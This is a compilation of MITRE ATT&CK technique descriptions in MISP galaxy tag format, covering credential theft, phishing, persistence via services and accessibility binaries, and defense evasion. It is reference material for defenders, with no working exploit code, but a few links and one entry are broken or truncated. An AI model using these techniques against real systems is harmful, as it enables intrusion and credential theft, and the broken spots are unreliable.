An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc. (Citation: OS X Keychain) (Citation: OSX Keydnap malware)

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple's keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple's securityd utility takes the user's logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over
the other values to unlock the final password.(Citation: OS X Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1555.002"

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**Container API - T1552.007**

Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod’s service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

The tag is: misp-galaxy:mitre-attack-pattern="Container API - T1552.007"

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**Email Accounts - T1585.002**

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services. (Citation: Trend Micro R980 2016)

The tag is: *misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002"

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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
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**Silver Ticket - T1558.002**

Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets. (Citation: ADSecurity Silver Tickets)

Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult. (Citation: ADSecurity Detecting Forged Tickets)

Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).

The tag is: *misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002"

Table 3591. Table References

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**Vulnerability Scanning - T1595.002**

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host...](https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea)
Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: *misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002"*

### Indicator Blocking - T1562.006

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW), by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

The tag is: *misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006"*

### Table 3592. Table References

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**Spearphishing Link - T1566.002**

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), like OAuth tokens, in order to gain access to protected applications and information. (Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"`

**Table 3594. Table References**

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**Email Accounts - T1586.002**

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a
compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

The tag is: *misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002"*

### Table 3595. Table References

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## Service Execution - T1569.002

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.

The tag is: *misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002"*

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Email Addresses - T1589.002

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: *misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002"

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Spearphishing Attachment - T1598.002

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file. (Citation: Sophos Attachment) (Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: *misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002"
Windows Service - T1543.003

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.

An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).

The tag is: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"`

Table 3599. Table References

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Launch Daemon - T1543.004

Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple's developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in `<code>/System/Library/LaunchDaemons</code>` and `<code>/Library/LaunchDaemons</code>` (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.

The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004"

Hidden Window - T1564.003

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an
operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.

On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)

Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock.

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system. (Citation: Antiquated Mac Malware)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"</code>

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### Time Providers - T1547.003

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003"</code>
DNS Calculation - T1568.003

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel. (Citation: Meyers Numbered Panda)

One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic. (Citation: Meyers Numbered Panda) (Citation: Moran 2014) (Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Calculation - T1568.003"

Web Services - T1583.006

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006"
Digital Certificates - T1596.003

Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.

Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1596.003"

Digital Certificates - T1587.003

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1598)).
T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).

After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: `misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003"

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**Employee Names - T1589.003**

Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: `misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003"

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**Spearphishing Link - T1598.003**

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: `misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003"`

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**Dylib Hijacking - T1574.004**

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with `<code>@rpath</code>`, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the `<code>LC_LOAD_WEAK_DYLIB</code>` function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path. Dylibs are loaded into an application’s address space allowing the malicious dylib to inherit the application’s privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: `misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004"`

**Table 3609. Table References**
**LC_LOAD_DYLIB Addition - T1546.006**

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)

The tag is: *misp-galaxy:mitre-attack-pattern=*"LC_LOAD_DYLIB Addition - T1546.006”

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VBA Stomping - T1564.007

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data. (Citation: FireEye VBA stomp Feb 2020)

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a `<code>PerformanceCache</code>` that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the `<code>_VBA_PROJECT</code>` stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application. (Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)

An adversary may hide malicious VBA code by overwriting the VBA source code location with zero's, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the `<code>_VBA_PROJECT</code>` stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis. (Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)

The tag is: misp-galaxy:mitre-attack-pattern="VBA Stomping - T1564.007"

Table 3611. Table References

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Accessibility Features - T1546.008

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are `<code>C:\Windows\System32\sethc.exe</code>`, launched when the shift key is pressed five times and `<code>C:\Windows\System32\utilman.exe</code>`, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in `<code>%systemdir%</code>`, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., `<code>C:\Windows\System32\utilman.exe</code>)) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

- On-Screen Keyboard: `<code>C:\Windows\System32\osk.exe</code>`
- Magnifier: `<code>C:\Windows\System32\Magnify.exe</code>`
- Narrator: `<code>C:\Windows\System32\Narrator.exe</code>`
- Display Switcher: `<code>C:\Windows\System32\DisplaySwitch.exe</code>`
- App Switcher: `<code>C:\Windows\System32\AtBroker.exe</code>`

The tag is: `misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008"`

**Table 3612. Table References**

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Web Services - T1584.006

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.

The tag is: *misp-galaxy:mitre-attack-pattern="Web Services - T1584.006"*

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AppCert DLLs - T1546.009

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the Registry key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

The tag is: *misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009"*
LSASS Driver - T1547.008

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.

The tag is: *misp-galaxy:mitre-attack-pattern*="LSASS Driver - T1547.008"

Table 3615. Table References

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Shortcut Modification - T1547.009

Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.

The tag is: *misp-galaxy:mitre-attack-pattern*="Shortcut Modification - T1547.009"

Table 3616. Table References

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Digital Certificates - T1588.004

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)

After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: `misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004"`

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Password Managers - T1555.005

Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)

Adversaries may acquire user credentials from password managers by extracting the master
Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212). Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.

The tag is: *misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005"*

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### Scan Databases - T1596.005

Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners. (Citation: Shodan)

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: *misp-galaxy:mitre-attack-pattern="Scan Databases - T1596.005"*

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Application Shimming - T1546.011

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

- `<code>%WINDIR%\AppPatch\sysmain.sdb</code>` and
- `<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>`

Custom databases are stored in:

- `<code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code>` and
